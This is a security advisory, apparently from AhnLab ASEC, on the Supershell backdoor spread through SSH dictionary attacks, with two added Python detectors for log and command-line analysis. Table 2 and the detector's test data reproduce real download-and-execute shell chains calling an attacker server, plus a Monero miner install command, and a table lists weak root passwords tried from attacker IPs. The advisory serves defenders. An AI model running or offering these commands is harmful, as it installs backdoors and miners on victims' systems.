- Short Summary: AhnLab SEcurity intelligence Center (ASEC) has identified an attack involving the Supershell backdoor on poorly managed Linux SSH servers. This backdoor, developed in Go by a Chinese-speaking developer, enables remote control of infected systems and is often accompanied by attempts to exploit weak passwords through dictionary attacks.
- Key Points:
  - Supershell is a backdoor malware that allows remote control of infected systems.
  - It is developed in the Go programming language and supports multiple platforms.
  - The malware was installed on inadequately managed Linux SSH servers.
  - The threat actor used dictionary attacks to gain access to systems.
  - Commands were executed to download and install Supershell from various sources.
  - There is a potential link to cryptocurrency mining, as Supershell may be used to install CoinMiners.
  - Recommendations for administrators include using strong passwords, regular updates, and security programs.
MITRE ATT&CK TTPs – created by AI
- Technique Name: Remote Access Software (T1219)
  - Supershell acts as a reverse shell, allowing remote control of infected systems.
- Technique Name: Credential Dumping (T1003)
  - Threat actors used dictionary attacks to attempt to log in to systems with weak passwords.
- Technique Name: Command and Scripting Interpreter (T1059)
  - Commands were executed to download and install Supershell using shell commands.
- Technique Name: Data Obfuscation (T1001)
  - The malware is obfuscated but can be identified through internal strings and behavior.
- Technique Name: Exfiltration Over Command and Control Channel (T1041)
  - Supershell allows the threat actor to control the infected system and potentially exfiltrate data.
AhnLab SEcurity intelligence Center (ASEC) has recently discovered an attack case installing the Supershell backdoor on inadequately managed Linux SSH servers. Created by a Chinese-speaking developer, Supershell is developed in the Go language and supports various platforms including Windows, Linux, and Android. Its primary function is a reverse shell, which allows a threat actor to remotely control an infected system.
Figure 1. GitHub page of Supershell
It is suspected that the threat actor installed a scanner after infecting multiple systems and then attempted to log in through dictionary attacks from the following attack sources.
| Threat Actor IP | ID/PW |
|---|---|
| 209.141.60[.]249 | root / qwer |
| 179.61.253[.]67 | root / password, root / a123456789, root / a1234567, root / newroot, root / 123qaz!@#, root / Passw0rd, root / 123qweASD, root / abc123, root / daniel, root / 1qaz@wsx |
| 107.189.8[.]15 | root / doctor |
| 2.58.84[.]90 | root / Admin123!, root / 123456qwerty, root / cocacola, root / qweasd!@# |

Table 1. Attack source addresses and credential information used during the login attempt process
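The login behaviour in Table 1 (one source cycling through many passwords for root) is visible in sshd's own authentication log before any command ever runs. The following is an added example, not code from the ASEC report: it parses sshd syslog lines, counts failed password logins per source IP inside a sliding window, and reports sources that cross a threshold, flagging those from which a login later succeeded. The log lines are constructed samples (the IPs are the Table 1 sources with the defanging brackets removed); the regex, window, threshold and function names are this example's own assumptions.

```python
"""Detect SSH dictionary attacks in sshd authentication logs.

Added example, not code from the ASEC report. Log lines below are
constructed samples in standard sshd syslog format; regex, window and
threshold are assumptions chosen for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# syslog timestamps carry no year, so the parser takes one as a parameter
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

# constructed sample log: one source hammering root, then getting in
SAMPLE_LOG = """\
Sep  9 03:12:01 srv sshd[2101]: Failed password for root from 179.61.253.67 port 41022 ssh2
Sep  9 03:12:03 srv sshd[2103]: Failed password for root from 179.61.253.67 port 41030 ssh2
Sep  9 03:12:05 srv sshd[2105]: Failed password for root from 179.61.253.67 port 41038 ssh2
Sep  9 03:12:07 srv sshd[2107]: Failed password for root from 179.61.253.67 port 41044 ssh2
Sep  9 03:12:09 srv sshd[2109]: Failed password for root from 179.61.253.67 port 41051 ssh2
Sep  9 03:12:11 srv sshd[2111]: Accepted password for root from 179.61.253.67 port 41060 ssh2
Sep  9 03:40:00 srv sshd[2200]: Failed password for invalid user daniel from 10.0.0.8 port 50010 ssh2
Sep  9 04:00:15 srv sshd[2300]: Failed password for root from 209.141.60.249 port 39001 ssh2
""".splitlines()


def parse_line(line, year=2024):
    """Return a dict for an sshd password-auth line, or None for anything else."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def find_dictionary_attacks(lines, threshold=5, window=timedelta(minutes=10)):
    """Map each source IP with >= threshold failures inside one window to a
    summary: total failures, user names tried, and whether a login later
    succeeded from that IP (the case that needs an immediate response)."""
    failures = defaultdict(list)
    users = defaultdict(set)
    succeeded = set()
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["result"] == "Failed":
            failures[ev["ip"]].append(ev["ts"])
            users[ev["ip"]].add(ev["user"])
        else:
            succeeded.add(ev["ip"])

    hits = {}
    for ip, stamps in failures.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            # slide the left edge until the span fits inside `window`
            while stamps[end] - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = {
                    "failures": len(stamps),
                    "users": sorted(users[ip]),
                    "succeeded": ip in succeeded,
                }
                break
    return hits


if __name__ == "__main__":
    for ip, info in find_dictionary_attacks(SAMPLE_LOG).items():
        flag = "LOGIN SUCCEEDED" if info["succeeded"] else "no success seen"
        print(f"{ip}: {info['failures']} failures for {info['users']} ({flag})")
```

sshd never logs the password that was tried, so the only signal available in the log is the rate of failures per source; a succeeded-after-failures source is the one to treat as compromised and check for the Table 2 command chains.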
After successfully carrying out the attack, the threat actor executed commands (see Table 2) to directly install Supershell or install a shell script that serves as a downloader. Supershell was downloaded not only through web servers but also via FTP servers.
```
# cd /tmp ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1; rm -r *
# cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://45.15.143[.]197/sensi.sh; curl -O hxxp://45.15.143[.]197/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 45.15.143[.]197 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 45.15.143[.]197; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.15.143[.]197 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *
# cd /etc ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1 ; wget hxxp://45.15.143[.]197/x64.bin ; chmod +x x64.bin ; ./x64.bin ; rm -r *
# cd /tmp ; curl hxxp://45.15.143[.]197:44581/ssh1.sh | sh ; wget hxxp://45.15.143[.]197:44581/ssh1.sh ; sh ssh1.sh ; rm -r *
# cd /tmp ; curl -s -L hxxps://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx ; wget hxxp://45.15.143[.]197:10086/supershell/compile/download/ssh1 ; chmod +x ssh1 ; ./ssh1 ; rm -r ssh1
```

Table 2. Commands identified in the attack case
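Every command in Table 2 follows the same shape: change to a writable directory, fetch a file over HTTP, TFTP or FTP, make it executable, run it, and delete the evidence. That structure is what a defender can match in shell history or auditd/EDR command-line telemetry. The following is an added example, not code from the ASEC report: it splits a captured command line into its simple commands, classifies each into a fetch, chmod, execute or cleanup stage, and collects the hosts contacted. The inputs are the defanged Table 2 commands plus one constructed benign line; the stage heuristics, regexes and function names are this example's own assumptions, and defanged hosts are reported exactly as written rather than refanged.

```python
"""Flag download-and-execute shell chains like the Table 2 commands.

Added example, not code from the ASEC report. Inputs are the defanged
commands from Table 2 plus one constructed benign line; the stage
heuristics and regexes are assumptions chosen for the example.
"""
import re
import shlex

FETCHERS = {"wget", "curl", "tftp", "ftpget"}
SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")          # ; && || and |
URL_HOST_RE = re.compile(r"(?:hxxps?|https?)://([^/\s:]+)")  # live or defanged URLs
IP_RE = re.compile(r"\b\d{1,3}(?:(?:\[\.\]|\.)\d{1,3}){3}\b")  # dotted or [.] defanged
ENV_ASSIGN_RE = re.compile(r"^\w+=")                       # leading VAR=value prefixes

# the Table 2 commands, prompt markers removed, defanging kept as in the report
TABLE2_COMMANDS = [
    "cd /tmp ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1; rm -r *",
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://45.15.143[.]197/sensi.sh; curl -O hxxp://45.15.143[.]197/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 45.15.143[.]197 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 45.15.143[.]197; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.15.143[.]197 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *",
    "cd /etc ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1 ; wget hxxp://45.15.143[.]197/x64.bin ; chmod +x x64.bin ; ./x64.bin ; rm -r *",
    "cd /tmp ; curl hxxp://45.15.143[.]197:44581/ssh1.sh | sh ; wget hxxp://45.15.143[.]197:44581/ssh1.sh ; sh ssh1.sh ; rm -r *",
    "cd /tmp ; curl -s -L hxxps://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx ; wget hxxp://45.15.143[.]197:10086/supershell/compile/download/ssh1 ; chmod +x ssh1 ; ./ssh1 ; rm -r ssh1",
]
# constructed benign line: a download with no execution stage
BENIGN_COMMAND = "cd /tmp ; wget https://example.invalid/notes.txt ; cat notes.txt ; rm notes.txt"


def split_chain(cmdline):
    """Return the simple commands of a chain as argv lists, dropping leading
    VAR=value assignments and skipping any piece shlex cannot parse."""
    parts = []
    for chunk in SPLIT_RE.split(cmdline):
        try:
            argv = shlex.split(chunk)
        except ValueError:
            continue
        while argv and ENV_ASSIGN_RE.match(argv[0]):
            argv = argv[1:]
        if argv:
            parts.append(argv)
    return parts


def analyze(cmdline):
    """Classify the chain's stages and collect contacted hosts. The chain is
    reported as suspicious when an execution stage follows a fetch stage."""
    stages = {"fetch": [], "chmod": [], "exec": [], "cleanup": []}
    hosts = set(URL_HOST_RE.findall(cmdline))
    first_fetch = last_exec = None
    for idx, argv in enumerate(split_chain(cmdline)):
        prog = argv[0]
        if prog in FETCHERS:
            stages["fetch"].append(prog)
            first_fetch = idx if first_fetch is None else first_fetch
            # tftp/ftpget take the server as a bare argument rather than a URL
            for arg in argv[1:]:
                hosts.update(IP_RE.findall(arg))
        elif prog == "chmod":
            stages["chmod"].append(" ".join(argv[1:]))
        elif prog.startswith("./") or prog in {"sh", "bash"}:
            stages["exec"].append(" ".join(argv))
            last_exec = idx
        elif prog == "rm":
            stages["cleanup"].append(" ".join(argv))
    suspicious = first_fetch is not None and last_exec is not None and last_exec > first_fetch
    return {"suspicious": suspicious, "stages": stages, "hosts": hosts}


if __name__ == "__main__":
    for cmd in TABLE2_COMMANDS + [BENIGN_COMMAND]:
        r = analyze(cmd)
        print(f"suspicious={r['suspicious']} hosts={sorted(r['hosts'])} "
              f"fetch={r['stages']['fetch']} exec={len(r['stages']['exec'])}")
```

A bare `sh` or `bash` is counted as an execution stage because, in these chains, it only ever appears as the consumer of a `curl ... | sh` pipe; the chmod and rm stages are kept as supporting evidence rather than required, since the `curl | sh` variant in Table 2 has neither.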
The malware that is ultimately installed is obfuscated, but it can be identified as the Supershell backdoor through a few internal strings, its behavior, and the strings observed during its execution process.
Figure 2. Obfuscated Supershell
Figure 3. Log showing Supershell’s execution
In attacks targeting poorly managed Linux systems, it is common to see the installation of CoinMiners like XMRig or DDoS bots such as ShellBot and Tsunami. In the attack observed this time, the threat actor initially installed Supershell for control hijacking purposes. However, given that there are cases where XMRig Monero CoinMiners are also installed alongside Supershell, it appears that the attacker’s ultimate goal is to mine cryptocurrency.
871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx

Table 3. Threat actor’s Monero wallet address
Recently, Supershell has been installed on poorly managed Linux SSH servers. When the backdoor malware is installed, a Linux server can receive commands from the threat actor and be hijacked.
Administrators should therefore use passwords that are difficult to guess and change them periodically to protect Linux servers from brute-force and dictionary attacks, and apply the latest patches to prevent exploitation of vulnerabilities. They should also use security programs such as firewalls on servers that are reachable from outside to restrict access by threat actors. Finally, V3 should be kept updated to the latest version to block malware infections in advance.
Detection Names
Backdoor/Linux.CobaltStrike.3753120 (2024.09.11.00)
Downloader/Shell.Agent.SC203780 (2024.09.11.00)
Downloader/Shell.ElfMiner.S1705 (2021.11.29.02)
Source : https://asec.ahnlab.com/en/83232/